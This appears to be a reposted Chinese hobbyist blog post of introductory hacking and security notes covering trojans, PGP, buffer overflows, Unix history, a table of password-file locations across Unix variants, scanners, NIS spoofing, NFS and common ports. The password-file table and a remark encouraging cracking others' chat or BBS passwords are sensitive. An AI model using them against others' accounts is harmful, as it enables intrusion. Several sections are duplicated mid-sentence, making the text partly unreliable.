我想这个大家应该是熟知的了。特洛伊木马是一类恶意的危害安全的程序,它和病毒的区别是特洛伊木马不可以自行传播,而是依靠寄生或
人为的“种植”而传播的。最为著名的特洛伊木马称为PKZIP300,文件名称可能是PKZIP300.ZIP或者EXE文件了,看来似乎是PKZIP的最新版本。
如果你发现了该程序最明智的选择就是别去下载,因为你要是运行了它它会把硬盘清除并干扰猫的使用。现在很大部分人分不清远程控制器和
木马之间到底是一样呢还是不一样。其实它们区别很大,我在这里就不很详细的说明了,但是希望大家知道一点就是远程控制器所运行的环境
则是需要一个木马来支持的(通常这个木马被称为S端,也就是服务端)。而很多时候这些是被黑客使用。

● 关于PGP的介绍
PGP是E文"Pretty Good Privacy"(良好隐私)的缩写。它的创始者是USA的Phil Zimmermann。他把RSA公匙体系的安全方便和传统加密体系的
告诉结合起来,并且在数字签名和密匙认证管理机制上有很好的设计,所以PGP是目前较为流行的加密软件包。PGP目前运行在MS-DOS、Unix、
VAX/AMS等各种不同类型的操作系统上的版本。它是一种大众使用的加密软件大家都知道在Internet上传输的数据是不加密的,所以如果你自己
不保护自己的信息的话,那么可能被黑客利用而获得你的隐私。。。。。PGP的命令参数我看了就头晕,因为我只是爱好而已,所以不会花时间
和经理去研究它的,但我知道有一个叫PGPSHELL的工具可以让你简单的生成自己的密匙。

● 什么是缓冲区溢出
缓冲区溢出(bufer overflow)指的是一种系统攻击的手段,通过往程序的缓冲区写入超出其长度的内容,而造成缓冲区的溢出,从而破坏程序
的堆栈,使程序转而执行其他的命令,以达到攻击的目的。而造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。最为常见的手段
是通过使某个特殊程序的缓冲区溢出而执行一个shell,通过shell的权限可以执行高级的命令。如果这个特殊程序属于root并且有suid的话,
攻击者便可获得一个具有root权限的shell。那么是怎么样才可以制造缓冲区溢出呢?其实关于这些方面的实例在网上都有很多。你可以找找,
别问我,我不知道。~-~

● 关于Unix系统
Unix是在1969年由ken Thompson、Dennis Ritchie与一些人在一部PDP-7上进行的一些工作,后来这个系统变成了Unix。由于AT&T、Berkeley等
组织的介入,使的Unix的发展得以壮大,并且逐渐形成了两大流派,那就是AT&T的System V跟伯克利软件组织的BSD。而SVR4则是两大流派融合
后的产物。在其间1991年底,开放软件组织(Open Software Foundation)推出了OSF/1试图与System V抗衡,但是现在来看OSF/1就有些不自量
力了。

● 不同UNIX系统中口令文件的位置

系统 路 径 符号
UNICOS /etc/udb *

Ultrix 4 /etc/auth[.dir|.pag] *

System V Release 4.0 /etc/shadow x

System V Release 4.2 /etc/security/*database x

Linux1.1 /etc/shadow *

IRIX5 /etc/shadow X

EP/IX /etc/shadow X

HP-UX /.secure/etc/passwd *

DG/UX /etc/tcb/aa/user *

ConvexOS 10/11 /etc/shadow *

BSD4.3-Reno /etc/master.passwd *

A/UX 3.0s /tcb/files/auth/?/*

SunOS5.0 /etc/shadow

OSF/1 /etc/passwd[.dir|.pag] *

SunOS4.1+c2 /etc/security/passwd.adjunct ##username

AIX 3 /etc/security/passwd ! #
/tcb/auth/files/

SCO Unix #.2.x /tcb/auth/files// *


系统 路 径 符号
UNICOS /etc/udb *

Ultrix 4 /etc/auth[.dir|.pag] *

System V Release 4.0 /etc/shadow x

System V Release4.2 /etc/security/*database x

Linux1.1 /etc/shadow *

IRIX5 /etc/shadow X

EP/IX /etc/shadow X

HP-UX /.secure/etc/passwd *

DG/UX /etc/tcb/aa/user *

ConvexOS 10/11 /etc/shadow *

BSD4.3-Reno /etc/master.passwd *

A/UX3.0s /tcb/files/auth/?/*

SunOS5.0 /etc/shadow

OSF/1 /etc/passwd[.dir|.pag] *

SunOS4.1+c2 /etc/security/passwd.adjunct ##username

AIX 3 /etc/security/passwd ! #
/tcb/auth/files/

SCO Unix #.2.x /tcb/auth/files// *

● 关于扫描工具的基础知识
在现在所有的Unix和windows等平台以及网络之中,都存在着相当多的安全隐患,而这些安全隐患的产生往往会导致使用者受到攻击或者错
误,这样以来,就需要一种能扫描出这些隐患的工具,把这些隐患扫描出来,而进行修改和填补。所以就产生了网络种的扫描工具。而对于
黑客来讲扫描工具是一种绝对必备的攻击工具,因为通过扫描黑客可以不留痕迹的检测到远程机器在安全性方面弱点的程序包。扫描工具虽
然可以让你找到系统的安全隐患,但是使用者还必须具备很多相关系统安全的知识,对扫描到的数据的理解是非常必要的。你也可以自己编
写一个扫描,扫描工具的其实并非难事,你只要具备TCP/IP相关的知识,以及C、shell或perl等一种或多种脚本语言(当然了,你还得去了
解一下Socket编程的知识)就可以自己编写一个自己的扫描工具了。大多扫描工具的原理都是相同的,你如果有兴趣自己写的话可以先从简
单的端口扫描程序开始就稍微好点。

● 关于NIS系统
NIS(以前也叫黄页服务,即YP)的实现是基于远程过程RPC协议的,她使用外部数据表示标准。NIS是由Sun Microsystem开发的,主要功能
是可以降低维护和配置UNIX网络系统的工作量。这是通过将每台机器的配置文件集中到一个NIS服务器上来实现的,因此如果改变NIS服务器
上的配置文件就可以完成对每台客户机的配置。而做位一个网络工具,它本身也存在有安全问题。而利用伪装成NIS服务器的方法,也是一个
比较流行的黑客攻击方式。往往NIS存在的安全隐患可以影响到UNIX配置文件/etc/passwd被映射成passwd.byname和passwd.byuid……并且使
攻击者获得root的访问权限。一般利用NIS做入侵的程序使用了Sun提供的Network Interface Tap软件模块,可以改变外部的数据包源IP地址。
以便能够使攻击者伪装成NIS服务器来获取权限……

● 关于NFS的协议
mount协议是NFS客户和NFS服务器用来进行初始化协商的,协商的内容包括:向客户端返回一个文件系统的句柄,报告被安装的文件系统的清
单,清除一个客户安装文件系统的记录,以及向客户报告可被安装的文件系统的清单。NFS协议是建立在mount协议之上的,通过NFS协议一个
客户可以列出所安装文件系统的目录清单,得到文件或者怒路的句柄,甚至可以创建、读写和修改文件。
正确建立了NFS包括客户和服务器的正确配置,NFS对于用户将是透明的,在一个客户端为了使用NFS需要运行biod、rpc.lockd和rpc.statd进
程。这些进程通常在系统的一个用语引导的脚本文件中被执行到,也可以手工启动……
而服务器端的NFS是通过启动nfsd和rpc.mount进程以及rpc.lock和rpc.statd进程来提供。同样这些进程通常在系统的一个引导的脚本文件中
被执行到。你也可以手工启动。


● 关于端口
自从学会了上网到现在,只要一连接到我的ISP就会满脑子的出现一些端口数字号,真是让人迷惑^*^。在Internet中每一台主机上,常常同时
运行着多个服务器进程,当与这台主机通信的时候,不但需要指出通信主机的地址,还要指明的就是这个主机上的某个服务通信道,而通常用
端口号来标识主机上这些不同的服务信道。端口号是一个16位的数,可以从1编到65535,在实际中,端口就像是一个国家的边防关卡。它的开
与关往往表示着国家的改革开放与搞活(这台主机拥有着某种服务),但是开放了总得要你出示你的过镜身份的证明,而不加以控制的开放那
么这个关卡可真就危险了。科学一点的说端口是这样的:……许多daemon程序可以在Internet上被初始化。它们中的绝大多数是客户的程序。
每当一个连接请求到达的时候,就会有一个服务器进程被启动,并由它与发出请求的客户端机器进行通信。为了促进这个进程,每个应用程序
都被赋予一个唯一的地址,它就称为端口。像FTP的是21、Telnet的是23、冰河木马的是7626……每个应用程序均与某个特殊的端口联系,当与
该端口有关的任何连接请求到达时,相应的应用程序就被启动(inetd就是这样的一个启动其他应用程序的程序)。
这里列及一些常用的端口及相应的服务或应用以攻参考:
文件传输协议(FTP) TCP port21
Telnet TCP Port23
简单邮件传输协议(SMTP)TCP Port25
Gopher TCP Port70
Finger TCP Port79
超文本传输协议(HTTP) TCP Port80
网络新闻传输协议(NNTP)TCP Port119
系统时间服务(NTP) TCP/UDP Port37
这里说一些题外话了,现在很多初学者很是热衷于聊天室或者BBS上破解别人的口令,但又不知从何入手。其实因为聊天室或者BBS上在你发出
信息的时候就是响应了某个端口号而进行的,如果你的破解有针对性的话,那么破解就会变的简单起来了。^*^
非难事,你只要具备TCP/IP相关的知识,以及C、shell或perl等一种或多种脚本语言(当然了,你还得去了
解一下Socket编程的知识)就可以自己编写一个自己的扫描工具了。大多扫描工具的原理都是相同的,你如果有兴趣自己写的话可以先从简
单的端口扫描程序开始就稍微好点。

● 关于NIS系统
NIS(以前也叫黄页服务,即YP)的实现是基于远程过程RPC协议的,她使用外部数据表示标准。NIS是由Sun Microsystem开发的,主要功能
是可以降低维护和配置UNIX网络系统的工作量。这是通过将每台机器的配置文件集中到一个NIS服务器上来实现的,因此如果改变NIS服务器
上的配置文件就可以完成对每台客户机的配置。而做位一个网络工具,它本身也存在有安全问题。而利用伪装成NIS服务器的方法,也是一个
比较流行的黑客攻击方式。往往NIS存在的安全隐患可以影响到UNIX配置文件/etc/passwd被映射成passwd.byname和passwd.byuid……并且使
攻击者获得root的访问权限。一般利用NIS做入侵的程序使用了Sun提供的Network Interface Tap软件模块,可以改变外部的数据包源IP地址。
以便能够使攻击者伪装成NIS服务器来获取权限……

● 关于NFS的协议
mount协议是NFS客户和NFS服务器用来进行初始化协商的,协商的内容包括:向客户端返回一个文件系统的句柄,报告被安装的文件系统的清单,清除一个客户安装文件系统的记录,以及向客户报告可被安装的文件系统的清单。NFS协议是建立在mount协议之上的,通过NFS协议一个
客户可以列出所安装文件系统的目录清单,得到文件或者怒路的句柄,甚至可以创建、读写和修改文件。
正确建立了N
  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值